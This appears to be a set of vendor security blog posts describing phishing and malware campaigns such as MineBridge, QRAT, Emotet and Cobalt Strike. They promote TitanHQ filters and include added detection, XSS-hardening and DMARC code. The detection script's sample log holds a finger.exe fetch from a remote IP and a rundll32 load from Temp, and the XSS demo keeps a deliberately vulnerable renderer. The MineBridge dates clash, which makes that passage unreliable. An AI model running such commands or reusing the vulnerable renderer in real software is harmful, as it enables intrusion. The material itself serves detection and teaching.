A web filtering solution is ideal for preventing attempts to visit the malicious domains where the phishing pages are hosted. Web filters such as WebTitan can be used to manage the websites that staff members can access on their company phones and mobile devices and will supply protection no matter where an employee uses the Internet.
It is also crucial to configure multi-factor authentication to stop any stolen credentials from being used by hackers to remotely log on to accounts. The FBI also advises granting network access using the principle of least privilege: ensuring users are only allowed access to the resources they need for their work. The FBI also advises regularly scanning and auditing the user access rights that have been allocated and reviewing any changes in permissions.
During 2020, the healthcare sector was heavily targeted by hacking groups, who took advantage of the pandemic to attack hospitals, and the organizations supporting them, while they were administering care to those suffering from the disease.
A massive ransomware campaign targeted one of the biggest healthcare suppliers in the United States. Universal Health Services, an American Fortune 500 company which has a staff of 90,000 people and runs 400 acute care hospitals, was impacted by a huge ransomware attack in September which damaged all of its hospitals. Staff were forced to work using pen and paper for three weeks while it repaired the damage by the attack.
Another illegal intrusion, into the University of Vermont Medical Center systems during October, impacted over 5,000 hospital computers and laptops and 1,300 servers. All devices had to have their data removed and their software and data reinstalled, with the healthcare provider suffering downtime for longer than two months. During the recovery process around $1.5 million was being lost per day to attack-linked expenses and lost business, with the total costs thought to be more than $64 million.
Ransomware attacks on the healthcare sector increased during September and October and continued to be an issue for the sector for the rest of the year. A research study by Tenable found that ransomware attacks accounted for 46% of all healthcare data breaches in 2020, showing the extent to which the industry was targeted.
Most of these attacks involved the exploitation of unpatched flaws, most commonly flaws in the Citrix ADC controller and Pulse Connect Secure VPN. Patches had been made available at the beginning of the year to fix the vulnerabilities, but they had not been applied swiftly. Phishing emails also gave ransomware groups the access to healthcare networks they needed to carry out ransomware attacks. Check Point’s research shows there was a 45% increase in cyberattacks on the industry from the start of November to the end of the year.
Another industry heavily targeted by hackers in 2020 was retail. As many different governments issued directives for citizens to remain home to curb the spread of the virus, online retailers saw a sales surge as shoppers made their purchases online rather than in physical stores. Experts at Salesforce saw that digital sales grew by 36% in 2020 compared to the previous year, and cybercriminals took advantage of the increase in digital sales.
Many methods were used to gain access to retailers’ systems and websites, with the most commonly seen tactic being web application attacks, which increased by 800% in 2020 according to the CDNetworks State of Web Security H1 2020 Report. Hackers also used credentials stolen in previous data breaches to attack online retail outlets in credential stuffing attacks; Akamai’s tracking revealed that retail was the sector most targeted with this technique, accounting for around 90% of such attacks.
As is typical every year, the large amounts of shoppers that head online to complete purchases in the run up to Black Friday and Cyber Monday were exploited, with phishing attacks linked to these shopping events increasing thirteenfold in the six-week time period before Black Friday. In November, 1 in every 826 emails was an online shopping related phishing campaign, as opposed to 1 in 11,000 in October, according to Check Point. Content management systems used by retailers were also targeted, and attacks on retail APIs also grew during 2020.
As 2021 begins, both sectors are likely to go on being heavily focused on. Ransomware and phishing attacks on healthcare suppliers could well grow now that vaccines are being rolled out, and with many consumers still choosing to buy online rather than in person, the retail sector looks set to have another bad 12-month period.
Luckily, by using cybersecurity best practices it is possible to obstruct most of these attacks. Patches need to be applied quickly, especially any flaws in remote access software, VPNs, or popular networking equipment, as those vulnerabilities are rapidly targeted.
An advanced anti-phishing solution needs to be configured to prevent phishing attacks at source and ensure that malicious messages do not land in inboxes. Multi-factor authentication should also be put in place on email accounts and remote access solutions to obstruct credential stuffing attacks.
A web filter is vital for preventing the web-based component of phishing and cyberattacks. Web filters stop staff members from accessing malicious websites and block malware/ransomware installations and C2 callbacks. For retail in particular, the use of web application firewalls, safeguarding transaction processing, and the proper use of Transport Layer Security across a website (HTTPS) are crucial.
By adhering to cybersecurity best practices, healthcare suppliers, retailers, and other targeted sectors will make it much harder for hackers to gain a profit. TitanHQ can help with SpamTitan Email Security and WebTitan Web Security to safeguard against email and web-based attacks in 2021. To find out more on these two products and how you can use them to safeguard your databases, call TitanHQ now.
A phishing campaign has been discovered that abuses the Windows Finger command to install a malware strain called MineBridge.
The Finger command in Windows can be run by a local user to gather a list of users on a remote machine or, alternatively, to collect information about a specific remote user. The Finger utility originated on Unix and Linux operating systems but is also included in Windows. It allows a user to check whether a particular user is logged on, although this is now rarely used.
There are security issues with the finger utility, and it has been taken advantage of previously to ascertain basic information about users that can be targeted in social engineering attacks. Weaknesses in the finger protocol have also been exploited in the past by some malware strains.
Recently, security experts discovered that Finger can be used as a LOLBin (a living-off-the-land binary) to download malware from a remote server or to exfiltrate data without triggering security alerts. Finger is now being used in at least one phishing campaign to install malware.
MineBridge malware is a Windows backdoor written in C++ that has previously been used in attacks on South Korean businesses. The malware was initially discovered in December 2020 by experts at FireEye and in January 2020 many different campaigns were identified spreading the malware via phishing emails with malicious Word files.
The most recent campaign sees the hackers pretend to be a recruitment business. The email is a recommendation of an individual for consideration for a position at the targeted company. The sender recommends that even if there are no current vacancies, the CV should be reviewed and the individual considered for a future position. The email is well written and seems genuine.
As is typical in phishing attacks, if the document is clicked a message will be shown that tells the user the document has been set up in an older version of Windows and to review the content the user must ‘enable editing’ and then ‘enable content’. Doing so will run the macro, which will install a Base64 encoded certificate using the Finger command. The certificate is a malware installer that leverages DLL hijacking to sideload the MineBridge backdoor. Once in place, MineBridge will give the hacker control over an infected device and allow a range of malicious actions to be carried out.
It is simplest to prevent attacks like this by configuring an advanced spam filtering solution to block phishing emails and stop them from reaching inboxes. As an extra security measure against this and other campaigns that target the Finger.exe utility in Windows, admins should think about disabling finger.exe if it is never employed.
It can be tricky for staff members to spot phishing scams, as the attacks typically give a plausible reason for performing an action such as downloading an update. The web portals provided are practically indistinguishable from the real websites that the scammers spoof, and credentials are commonly stolen as a result.
The pandemic has seen growing numbers of employees working from home and logging onto their company’s cloud applications remotely. Companies are now much more dependent on email for communication than when staff members were all office based. Hackers have been taking advantage and have been targeting remote workers with phishing scams and many of these attacks have been profitable.
Staff members are often given more training on cybersecurity and are warned to be wary of emails that have been sent from unrecognized people, but many still open the emails and take the desired action. The emails often pretend to be from an individual that is known to the recipient, which increases the chances of the email being opened. It is also common for well-known companies to be impersonated in phishing attacks, with the hackers leveraging trust in that brand.
A recent review of phishing emails by Check Point showed that the most commonly impersonated brand in phishing attacks over the past quarter is Microsoft, which is not surprising given the number of businesses using Office 365. The study revealed 43% of phishing attempts that mimic brands pretend to be Microsoft.
Microsoft credentials are recorded in these attacks and are used to remotely log on to accounts. The data stored in just one email account can be massive. There have been many healthcare phishing campaigns in which a single compromised account contained the sensitive data of tens of thousands or even hundreds of thousands of clients. These phishing emails are often only the first step in a multi-stage attack that gives the threat actors the foothold they need for a much more in-depth attack on the organization, often resulting in the theft of large amounts of data and ending with the deployment of ransomware.
Microsoft is far from the only brand impersonated. The review showed that DHL is the second most impersonated brand. DHL-based phishing attacks use failed delivery alerts and shipping notices as the lure to get individuals to either share sensitive information such as login details or open malicious email attachments that install malware. 18% of all brand impersonation phishing attacks involve the impersonation of DHL. This makes sense as the phishers target companies, especially during a pandemic when there is increased reliance on courier businesses.
Other well-known companies that are commonly impersonated include PayPal and Chase, to obtain account details; LinkedIn, to allow professional networking accounts to be infiltrated; and Google and Yahoo, also to obtain account details. Attacks spoofing Amazon, Rakuten, and IKEA also feature in the list of the top 10 most spoofed brands.
Phishers mostly aim for company users as their credentials are far more profitable. Businesses therefore need to ensure that their phishing security measures are up to date. Security awareness training for employees is important, but given the realistic danger of phishing emails and the plausibility of the lures deployed, it is crucial for more reliable measures to be implemented to prevent phishing attacks.
To better secure your company from phishing campaigns, a third-party spam filter should be layered on top of Office 365. SpamTitan has been designed to supply enhanced protection for businesses that use Office 365. The solution integrates easily with Office 365 and is easy to configure and manage. The result will be far better security from phishing campaigns and other malicious emails that employees struggle to recognize.
For more details on SpamTitan, to sign up for a free trial, and for details of pricing, give the TitanHQ team a call now.
The Qnode Remote Access Trojan (QRAT) is currently being distributed via a Trump-themed phishing campaign, masked as a video file that claims to be a Donald Trump sex tape.
QRAT is a Java-based RAT that was first seen in 2015 and has been used in many different phishing campaigns over the years, with a vast increase in distribution seen since August 2020. Interestingly, the malicious file attachment – titled “TRUMP_SEX_SCANDAL_VIDEO.jar” – bears no resemblance to the phishing email body and subject line, which offer a loan for an investment in a dream project or business strategy. The subject line is “GOOD LOAN OFFER,” and the sender claims a loan will be supplied if there is a good return on the investment and that between $500,000 and $100 million can be provided. It is not known whether a mistake was made and the wrong file attachment was placed in the email, or if this was a deliberate mismatch of a malicious .jar file. While the emails are unlikely to fool many end users, there may be sufficient interest in the video to spark the curiosity of some recipients.
The phishing campaign seems to be poorly composed, but the same cannot be said of the malware the campaign is trying to infiltrate networks with. The recent version of QRAT shared in this campaign is more sophisticated than earlier witnessed versions, with several enhancements made to bypass security solutions. For example, the malicious code deployed as the QRAT downloader is obfuscated and split across many different buffers inside the .jar file.
Phishing campaigns often exploit interest in topical news stories, and the Presidential election, claims of election fraud, and recent events at Capitol Hill have seen President Trump trending. It is possible that this will not be the only Trump-themed phishing campaign to be carried out over the coming days and months.
This campaign seems to be focused on companies, where the potential profits from a malware infection are likely to be far greater than from an attack on consumers. Blocking threats such as this is simplest with an advanced email security solution capable of detecting known and new malware strains.
SpamTitan is a strong, inexpensive spam filtering solution for businesses and the leading cloud-based spam filter for managed service providers serving the SMB sector. SpamTitan uses dual anti-virus engines to spot known malware threats and a Bitdefender-powered sandbox to spot zero-day malware. The solution also supports the blocking of dangerous file types such as JARs and other executable files.
SpamTitan is also excellent at preventing phishing emails without malicious attachments, including emails with hyperlinks to malicious web pages. The solution has many threat detection features that can spot and block spam and email impersonation attacks, and machine learning technology and multiple threat intelligence feeds provide protection against zero-minute phishing campaigns.
One of the chief reasons why the solution is such a popular option for SMBs and MSPs is simple installation, use, and management. SpamTitan removes the complexity from email security to allow IT teams to focus on other key duties.
SpamTitan is the most highly rated solution on review sites such as Capterra, GetApp and Software Advice, is a top three solution in the three email security categories on Expert Insights, and has been a market leader in the G2 Email Security grids for 10 consecutive quarters.
If you would like a spam filtering solution that is strong and simple to deploy, give the TitanHQ team a call to set up a free trial of SpamTitan.
The Emotet botnet is back up and running after an eight-week absence and has been seen carrying out a phishing email campaign that is sending between 100,000 and 500,000 emails to recipients daily.
Emotet was first tracked in 2014 and began life as a banking Trojan; however, over the years the malware has evolved. While Emotet remains a banking Trojan, it is now best known as a malware downloader that is used to deliver a range of secondary payloads. The malware payloads it delivers also act as malware downloaders, so infection with Emotet often leads to multiple malware infections, with ransomware often delivered as the final payload.
Once Emotet is downloaded onto an endpoint it is added to the Emotet botnet and is used for spam and phishing attacks. Emotet emails copies of itself to the user’s contacts and uses other self-propagation mechanisms to infect other computers on the network. Emotet can be difficult to remove from a network: once one computer is cleaned, it is often reinfected by other infected computers on the network.
Emotet often goes inactive for many weeks or even months, but even with long gaps in operations, Emotet is still the chief malware threat. Emotet went dormant around February 2020, with activity resuming five months later in July. Activity continued until late October, when it stopped once again until Tuesday this week, when it came back in time for Christmas. In 2020, Emotet has been observed delivering TrickBot and other payloads such as Qakbot and ZLoader.
During the periods of inactivity, the threat actors responsible for the malware are not necessarily inactive; they just halt their distribution campaigns. During the breaks they update their malware and come back with a new and improved version that is more effective at evading security measures.
The most recent campaign uses similar tactics to past campaigns to maximize the probability of end users clicking on a malicious Office document. The phishing emails are usually personalized to make them look more authentic, with Emotet using hijacked message threads with malicious content included. Since the emails appear to be responses to past conversations between colleagues and contacts, there is a better chance that the recipient will open the email attachment or click a malicious URL.
This campaign uses password-protected files, with the password to open the file supplied in the message text of the email. Since email security solutions cannot open these files, it is more likely that they will be delivered to inboxes. The malicious documents shared in this campaign contain malicious macros. If the macros are enabled – which the user is told is necessary to view the content of the document – Emotet will be installed, after which the TrickBot Trojan will be delivered, usually followed by a ransomware variant such as Ryuk.
Earlier campaigns have not shown any additional content when the macros are enabled; however, this campaign displays an error message after the macros have been enabled telling the user that Word experienced an error opening the file. This is likely to make the user think that the Word document has been corrupted. A variety of themes are used for the emails, with the most recent campaign using holiday season and COVID-19 related lures.
A review by Cofense identified several changes in the most recent campaign, including switching the malware binary from an executable (.exe) file to a Dynamic Link Library (.dll) file, which is executed using rundll32.exe. The command-and-control communications have also been changed and now use binary data rather than plain text; both changes make the malware harder to spot.
Firms need to be particularly careful and should act swiftly if infections are detected and should take steps to ensure their networks are safeguarded with anti-virus software, security policies, spam filters, and web filters.
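Two of the behaviours described above leave a process-creation trail that endpoint telemetry can catch: finger.exe being launched by an Office application (the MineBridge macro) and rundll32.exe loading a DLL from a user-writable directory (Emotet’s switch from .exe to .dll). The following detection logic is an added example, not TitanHQ’s, Cofense’s or FireEye’s code. It assumes a constructed, simplified log format of one event per line, `timestamp|host|parent_image|image|command_line`; the field names of Sysmon Event ID 1 or Windows Security event 4688 map onto it directly, and the sample log lines are constructed for illustration.

```python
"""Detection rules for Office-spawned LOLBins and rundll32 loading DLLs from
user-writable paths. Added example; the log format and sample events are
constructed (assumption: "timestamp|host|parent_image|image|command_line").
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"finger.exe", "rundll32.exe", "certutil.exe", "mshta.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe"}
# Locations a macro can write to without elevation. A DLL loaded from here by
# rundll32 is far more suspicious than one loaded from System32.
USER_WRITABLE = re.compile(r"\\(users\\[^\\]+\\appdata|programdata|temp|public)\\",
                           re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(line: str) -> list[Finding]:
    """Apply the three rules to one log record and return any findings."""
    ts, host, parent, image, cmd = line.rstrip("\n").split("|", 4)
    parent_b, image_b = basename(parent), basename(image)
    findings: list[Finding] = []
    if parent_b in OFFICE_PARENTS and image_b in LOLBINS:
        findings.append(Finding(ts, host, "office_spawned_lolbin",
                                f"{parent_b} -> {image_b}: {cmd}"))
    if image_b == "finger.exe":
        # finger.exe is a legacy tool with no routine business use on most
        # estates, so any execution is worth a look (or block it outright).
        findings.append(Finding(ts, host, "finger_exe_executed", cmd))
    if image_b == "rundll32.exe" and USER_WRITABLE.search(cmd):
        findings.append(Finding(ts, host, "rundll32_user_writable_dll", cmd))
    return findings


def scan(lines: list[str]) -> list[Finding]:
    """Run analyse() over every record and flatten the findings."""
    return [f for line in lines for f in analyse(line)]


# Constructed sample log: one MineBridge-style event, one Emotet-style event,
# and two benign events that should produce no findings.
SAMPLE_LOG = [
    r"2021-01-14T09:12:03Z|WS-017|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\finger.exe|finger.exe cv@203.0.113.10",
    r"2020-12-22T14:05:41Z|WS-042|C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\alice\AppData\Local\Temp\ab12cd.dll,Control_RunDLL",
    r"2020-12-22T14:06:02Z|WS-042|C:\Windows\System32\svchost.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r"2021-01-14T09:15:27Z|WS-017|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\splwow64.exe|splwow64.exe 8192",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host} [{f.rule}] {f.detail}")
```

The first sample record fires two rules (Office parent plus finger.exe itself), the second fires the rundll32 rule, and the two benign records fire nothing; rundll32 loading shell32.dll from System32 is everyday Windows behaviour and must not alert, which is why the path check matters more than the image name.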
A new form of attack has been discovered that allows cybercriminals to carry out cross-site scripting attacks from within PDF files.
PDF files have been a favourite tool of hackers for some time for running phishing attacks and distributing malware. In a lot of cases emails are sent with PDF file attachments that include hyperlinks to malicious websites. By placing these URLs in the files instead of in the body of the email message, it is harder for security solutions to spot the malicious links.
This more recent form of attack also involves the use of PDF files, but instead of tricking employees into handing over their login details or visiting a malicious website where malware is downloaded, the hackers attempt to obtain sensitive information contained in the PDF files themselves.
The technique is similar to those used by hackers in web application attacks. Cross-site scripting attacks – or XSS attacks for short – normally involve injecting malicious scripts into legitimate websites and applications. When a user views the website or the compromised application, the script runs. The scripts give the hackers access to user information such as cookies, session tokens, and sensitive data saved in browsers, such as passwords. Since the website or application is genuine, the web browser will not identify the script as malicious. These attacks are possible in websites and web applications where user input is used to create output without correctly validating or encoding it.
What sort of data could be stolen in such an attack? A massive amount of sensitive data is contained in PDF files. PDF files are used extensively for reports, statements, logs, e-tickets, receipts, boarding passes, and a lot more. PDF files may include passport numbers, driver’s license numbers, bank account data, and a variety of other sensitive data. The presenters at the conference said that they discovered some of the largest libraries of PDF files globally were vulnerable to XSS attacks.
For the most part, the flaws in PDF files that allow XSS attacks are not due to the PDF files themselves but to incorrect coding. If PDF libraries fail to properly parse or escape characters and allow unprotected formats, they will be vulnerable. Luckily, Adobe released an update on December 9 which stops this type of security vulnerability from being exploited, although firms that create PDF files must update their software and apply the update to be protected.
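The root cause named above, user input used to build output without encoding it, is easiest to see in its web-application form. The snippet below is an added example, not code from the original post or from the PDF research it reports on: a vulnerable renderer that concatenates input into HTML, the hardened version that encodes for the HTML body context, and an attribute-context renderer that also restricts the URL scheme, since quoting alone does not stop a `javascript:` link. The function names and the probe strings are constructed for illustration.

```python
"""Vulnerable vs. hardened HTML rendering (added example, not the page's code)."""
import html
import re


def render_greeting_unsafe(user_input: str) -> str:
    """Vulnerable: user-controlled text is concatenated straight into HTML."""
    return f"<p>Hello, {user_input}!</p>"


def render_greeting_safe(user_input: str) -> str:
    """Hardened: encode the value for the HTML body context before output."""
    return f"<p>Hello, {html.escape(user_input, quote=True)}!</p>"


def render_link_safe(url: str, label: str) -> str:
    """Attribute context needs two controls: output encoding AND a scheme
    allow-list, because a quoted-but-unvalidated href still runs a javascript: URL."""
    if not re.match(r"^https?://", url, re.IGNORECASE):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label, quote=True)}</a>'


# Crude reviewer's check used only to contrast the two renderers: does the
# rendered output still contain a tag a browser would execute? Encoding, not
# filtering, is the fix; this regex is not a defence on its own.
SCRIPT_TAG = re.compile(r"<\s*(script|iframe|svg)\b", re.IGNORECASE)


def contains_script_tag(markup: str) -> bool:
    return bool(SCRIPT_TAG.search(markup))


if __name__ == "__main__":
    probe = "<script>/*probe*/</script>"          # constructed test input
    print(render_greeting_unsafe(probe))          # tag survives: exploitable
    print(render_greeting_safe(probe))            # tag is encoded: inert text
    print(render_link_safe("javascript:void(0)", "click"))
```

Run as a script it prints the unsafe output with the tag intact and the safe output with `&lt;script&gt;` in its place; the PDF case is the same defect in a different renderer, which is why the fix sits in the library that generates the document rather than in the document itself.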
This is just one way that malicious attachments can be leveraged to steal sensitive data. As was mentioned earlier, malicious macros are often added to Office documents, executable files are attached to emails disguised as legitimate files, and malicious code can be injected into a variety of different file types.
One of the best ways to secure your network from attacks via email using malicious attachments is to use an advanced email security solution that can spot not just known malware but also never-before-seen malicious code. This is an area that is a speciality of SpamTitan Email Security. SpamTitan uses dual anti-virus engines (Bitdefender/ClamAV) to block recognized malware threats and sandboxing to spot malicious code that has been placed in email attachments. Files are put through rigorous analysis in the security of the sandbox and are checked for any malicious intent.
Contact TitanHQ to discover more about keeping your organization safe from malicious emails and malware.
Hackers are attempting to exploit the rollout of COVID-19 vaccination programs around the world by launching a host of COVID-19 vaccine phishing campaigns, both to steal private protected data, including passwords for networks and databases, and to speed up the distribution of their malware via email.
A number of US government bodies have already issued warnings for businesses and consumers. These agencies include the Federal Bureau of Investigation (FBI), the Department of Health and Human Services’ Office of Inspector General and the Centers for Medicare and Medicaid Services.
These attacks will be disguised in a number of different ways. Those already identified include offers of early access to COVID-19 vaccine programmes, requests for a payment to skip the line and move to the head of the waiting list, and an offer for email recipients to register for another waiting list once they hand over some private personal information – which will later be used to break into personal accounts containing contact details and financial information.
Email is the chosen vector for these COVID-19 vaccine phishing scams, but it will be no surprise to see that they are also being conducted across a spectrum of websites, social media platforms, instant messaging platforms and even phone calls or SMS messages. The vast majority of these campaigns will take aim at individual consumers, but it is expected that they could reach business systems should employees access any of the media mentioned above while using their work network – or if the emails land in their corporate inboxes.
The scam emails will most of the time have links to web portals, hidden in email attachments to mask them from antivirus software, where information will be gathered that can be used to carry out fraud. In a lot of cases Office documents will be used to deliver malware via malicious macros. Mostly, these emails will claim to come from trusted entities or people. COVID-19 vaccine scam emails are likely to impersonate healthcare providers, health insurance firms, vaccine centers, and federal, state, or local public health bodies. Since the outbreak of COVID-19 there have been many cases of fraudsters impersonating the U.S. Centers for Disease Control and Prevention (CDC) and the World Health Organization (WHO) in COVID-19 related phishing campaigns.
Recently the U.S. Department of Justice revealed that two websites have been seized that claimed to be vaccine developers. The domains were practically identical to the authentic websites of two biotechnology firms working on vaccine development. The malicious content has been deleted but there is a strong chance that there are a huge number of other domains registered and used in COVID-19 vaccine phishing scams yet to be deployed.
Alerts have also been issued about the danger of ransomware attacks that aim to leverage interest in COVID-19 vaccines to give the hackers the access to systems they need to launch their attacks.
There are four important measures that companies should deploy to address the danger of being tricked by these scams. Since email is so widely used, it is crucial to have a strong spam filtering solution configured. Spam filters use blacklists of malicious email and IP addresses to block malicious emails, but since new IP addresses are constantly being brought into use for these campaigns, it is important to opt for a solution that features machine learning. Machine learning assists in spotting phishing attacks from IP addresses that have not previously been used for malicious purposes and in discovering zero-day phishing threats. Sandboxing is also crucial in the fight against zero-day malware threats whose signatures have yet to be incorporated into the virus definition lists of antivirus engines.
Even though spam filters can identify and block emails that include malicious links, a web filtering solution is also a very important tool. Web filters are used to manage the websites that employees are able to view and stop visits to malicious websites through general web browsing, redirects, and clicks on malicious links in emails. Web filters are constantly updated through threat intelligence feeds to protect against recently discovered malicious URLs.
Companies should not forget to conduct end user training and should constantly run refresher training sessions for staff to help them spot phishing attacks and malicious emails. Phishing simulation exercises are also good for evaluating the effectiveness of security awareness training.
Multi-factor authentication should also be implemented as an additional security measure. Should credentials be illegally obtained, multi-factor authentication will help to see to it that stolen details cannot be used to remotely log onto accounts.
Once these measures are put in place companies will be safe from the majority of malware attacks, including COVID-19 vaccine phishing attacks.
Contact the TitanHQ team as soon as you can to find out more about spam filtering, web filtering, and safeguarding your company from malware and phishing attacks.
The danger posed by phishing attacks is constant, and phishing is still the main cause of data breaches. All that is required is one member of staff to be tricked by a phishing email for threat actors to obtain the access they need to carry out further attacks on your group.
In this update we list some key 2020 phishing statistics to raise awareness of the threat and highlight the need for businesses to rethink their current phishing security measures.
Phishing is the most straightforward way for hackers to gain access to sensitive data and spread malware. Little skill or expertise is required to conduct a successful phishing campaign and steal credentials or infect users with malware. The most recent figures indicate that in 2020, 22% of reported data breaches began with a phishing email, and some of the largest data breaches in history have started with a phishing attack, including the 78.8 million record data breach at the health insurer Anthem Inc. and the huge Home Depot data breach in 2014 that saw the email addresses of 53 million individuals stolen.
Phishing can be carried out by phone, via SMS, social media networks, or instant messaging platforms, but email is the most common vector chosen. Around 96% of all phishing attacks take place over email. Successful phishing attacks lead to the theft of data, theft of credentials, or the installation of malware and ransomware. The cost of resolving the incidents and resultant data breaches is significant. The 2020 Cost of a Data Breach Report by the Ponemon Institute/IBM Security showed that the average cost of a data breach is around $150 per impacted record, with an overall cost of $3.86 million per breach. A single spear phishing attack costs around $1.6 million to address.
Staff members may think they are able to recognize phishing emails, but data from security awareness training companies show that in many cases that confidence is not well founded. One study in 2020 showed that 30% of end users opened phishing emails, 12% of users visited a malicious link or opened the attachment in the email, and one in 8 users then shared sensitive data on phishing web pages. This is despite 78% of users saying that they know they should never open email attachments from unknown senders or click links in unsolicited emails.
The 2020 phishing statistics show that phishing and spear phishing attacks are still incredibly common and that phishing attacks often succeed. Another study showed that 85% of firms have been tricked by a phishing attack at least once. New phishing websites are constantly being created for use in these scams. Once a URL is confirmed as malicious and placed on a blacklist, it has often already been abandoned by the cybercriminals. In 2020, around 1.5 million new phishing URLs were identified per month.
2020 registered a huge rise in ransomware attacks. While manual ransomware attacks often see networks infiltrated thanks to exploiting flaws in firewalls, VPNs, RDP, and networking equipment, ransomware is also sent using email. Since 2016, the number of phishing emails containing ransomware has grown by over 97%.
Taking on phishing and stopping successful attacks requires a defense in depth tactic. An advanced spam filtering solution is a must to prevent phishing emails from landing inboxes. Businesses that use Office 365 often rely on the protections that come as standard with their licenses, but studies have shown that the basic level of protection supplied by Microsoft’s Exchange Online Protection (EOP) is insufficient and average at best and phishing emails are often not spotted. A third-party, solution is recommended to layer on top of Office 365 – One that incorporates machine learning to spot never before seen phishing threats. The solution should implement email authentication protocols such as DMARC, DKIM, and SPF to identify and block email impersonation attacks and outbound scanning to discover compromised inboxes.
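To make the SPF/DKIM/DMARC point concrete, the following is an added example, not TitanHQ code, of how a receiving filter turns SPF and DKIM results into a DMARC verdict for the domain in the visible From: header. The point it shows is alignment: an attacker can pass SPF and DKIM for a domain they control, but that does not let them impersonate someone else’s From: address. The DNS lookups are replaced by records passed in directly, the Authentication-Results header parser is simplified, the organizational-domain logic is a two-label approximation of the Public Suffix List, and all sample headers and records are constructed.

```python
"""Added example: DMARC verdict from SPF/DKIM results (RFC 7489 alignment rules).
Not TitanHQ code. DNS is stubbed out: the DMARC record is passed in as a string."""
from typing import Dict, Tuple


def org_domain(domain: str) -> str:
    """Organizational domain used for relaxed alignment.
    Simplification: the last two labels. Real implementations consult the
    Public Suffix List so that e.g. shop.example.co.uk -> example.co.uk."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_dmarc(record: str) -> Dict[str, str]:
    """Parse the TXT record at _dmarc.<domain>, e.g. 'v=DMARC1; p=reject; adkim=s'."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record: %r" % record)
    tags.setdefault("p", "none")      # policy the receiver should apply: none | quarantine | reject
    tags.setdefault("aspf", "r")      # SPF alignment mode: r(elaxed) | s(trict)
    tags.setdefault("adkim", "r")     # DKIM alignment mode
    return tags


def parse_auth_results(header: str) -> Dict[str, Tuple[str, Dict[str, str]]]:
    """Parse a simplified Authentication-Results value (RFC 8601), e.g.
    'mx.example.net; spf=pass smtp.mailfrom=bounce.example.com; dkim=pass header.d=example.com'
    -> {'spf': ('pass', {'smtp.mailfrom': ...}), 'dkim': ('pass', {'header.d': ...})}"""
    results = {}
    for part in header.split(";")[1:]:          # the first part is the authserv-id
        tokens = part.split()
        if not tokens or "=" not in tokens[0]:
            continue                            # e.g. a bare 'none'
        method, result = tokens[0].split("=", 1)
        props = dict(t.split("=", 1) for t in tokens[1:] if "=" in t)
        results[method.lower()] = (result.lower(), props)
    return results


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """Strict alignment needs an exact match; relaxed only the same organizational domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def dmarc_verdict(from_domain: str, auth_results: str, dmarc_record: str) -> Tuple[str, str]:
    """Return (result, action). SPF or DKIM must both pass AND be aligned with the
    RFC5322.From domain; passing for the attacker's own domain is not enough."""
    tags = parse_dmarc(dmarc_record)
    ar = parse_auth_results(auth_results)
    spf_result, spf_props = ar.get("spf", ("none", {}))
    dkim_result, dkim_props = ar.get("dkim", ("none", {}))
    spf_ok = spf_result == "pass" and aligned(spf_props.get("smtp.mailfrom", ""), from_domain, tags["aspf"])
    dkim_ok = dkim_result == "pass" and aligned(dkim_props.get("header.d", ""), from_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass", "none"
    return "fail", tags["p"]


# Constructed sample record and headers (not taken from real mail).
RECORD = "v=DMARC1; p=reject; adkim=s; aspf=r"

if __name__ == "__main__":
    # Legitimate bulk mail: SPF passes for a subdomain, which relaxed aspf accepts.
    print(dmarc_verdict("example.com",
          "mx.example.net; spf=pass smtp.mailfrom=bounce.example.com; dkim=pass header.d=example.com",
          RECORD))
    # Impersonation: SPF and DKIM both pass, but only for the attacker's own domain.
    print(dmarc_verdict("example.com",
          "mx.example.net; spf=pass smtp.mailfrom=attacker.example; dkim=pass header.d=attacker.example",
          RECORD))
```

The second call is the impersonation case the paragraph describes: both authentication checks pass, yet the verdict is a fail with the domain owner’s requested action (reject), because neither authenticated domain aligns with the From: domain the recipient sees.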
End user training is also crucial. If a phishing email does reach an inbox, employees should be able to identify it as such and be conditioned to report it to the IT team, so that all copies of the message can be removed from users’ mailboxes. Web filters are also important for blocking the web-based component of phishing attacks and preventing employees from visiting phishing websites.
A malicious Cobalt Strike campaign has been discovered that uses phishing emails, malicious macros, PowerShell, and steganography to compromise unsuspecting email recipients.
The email carries a legacy Word attachment (.doc) with a malicious macro that, if allowed to run, downloads a PowerShell script from GitHub. That script then downloads a PNG image file from the legitimate image sharing service Imgur. The image has code hidden in its pixel values, which the script extracts and executes with a single command; in this instance the payload is a Cobalt Strike script.
Cobalt Strike is a widely used penetration testing tool. While it is used by security professionals for legitimate purposes, it is also valuable to attackers. The tool allows beacons to be deployed on compromised devices, which can be used to run PowerShell scripts, create web shells, escalate privileges, and provide remote access to those devices. In this campaign, hiding the code in the image and using legitimate services such as Imgur and GitHub helps the attackers evade detection.
Hiding code inside image files is known as steganography and has been used for many years to conceal malicious code, usually in PNG files, so that it is not discovered. In this campaign the deception does not end there. The Cobalt Strike script includes an EICAR test string, intended to trick security solutions and security teams into dismissing the malicious code as a harmless antivirus test file, while contact is made with the attackers’ command and control server and instructions are received.
